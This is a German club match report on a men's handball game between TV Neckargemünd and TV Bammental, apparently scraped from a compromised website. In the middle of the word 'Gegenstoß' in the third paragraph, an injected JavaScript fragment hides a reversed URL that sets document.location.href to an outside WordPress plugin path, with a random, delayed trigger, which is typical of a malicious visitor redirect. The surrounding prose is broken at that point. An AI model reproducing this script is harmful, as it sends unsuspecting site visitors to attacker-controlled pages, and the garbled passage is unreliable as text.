Am Tag vor dem ersten Advent empfangen die Herren des TV Neckargemünd unsere Gäste vom TV Bammental. Anpfiff 18:30, beide Bänke sind gefüllt. Nicht so die Halle. Auch nach dem unglücklichen Damenspiel sind die Zuschauerränge dünn besetzt (Ergebnisse/Tabelle)
Neckargemünd, 30.11.15 (ast)- Das Spiel beginnt wenig spektakulär mit guten Paraden der Keeper. Nach 4 Minuten steht es 0:0. Die Schwarzgelben starten dann endlich durch aber auch die grünen Bammentaler halten mit. Auf jeder Seite gibt es Torerfolge. Dann ändert sich das Spiel. Während die Neckargemünder im Angriff wenig Erfolg haben, können die Bammentaler einige Konter laufen. Das Ergebnis dreht sich dennoch nicht zugunsten der Gäste.
Fast jeder Gegenstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toß scheitert am neckargemünder Torhüter und die Abwehr steht solide, wie selten! Der neckargemünder Rückraum findet seine Chancen und verwandelt einen nach dem anderen. Schon zur Pause sieht das Spiel klar aus.
Bammental gibt sich dennoch nicht geschlagen, wieso auch? Viele junge Spieler geben ihr Bestes und bedrängen die Abwehr der Schwarzgelben zu jedem Zeitpunkt. Pech, dass die Neckargemünder mit ihrem Wahlspruch „noch einen“ fordern und hervorragend dagegen halten. Abwehr, Torhüter, alle stehen ihren Mann.
Das Gefecht zieht sich bis zum Endstand von 31:21 hin. Es wurde klar in der Abwehr gewonnen!
Danke an die Fans und die Mannschaftsverantwortlichen, die eine entgleiste Matte sicher befestigen konnten.
(Spielbericht leider nicht vorhanden)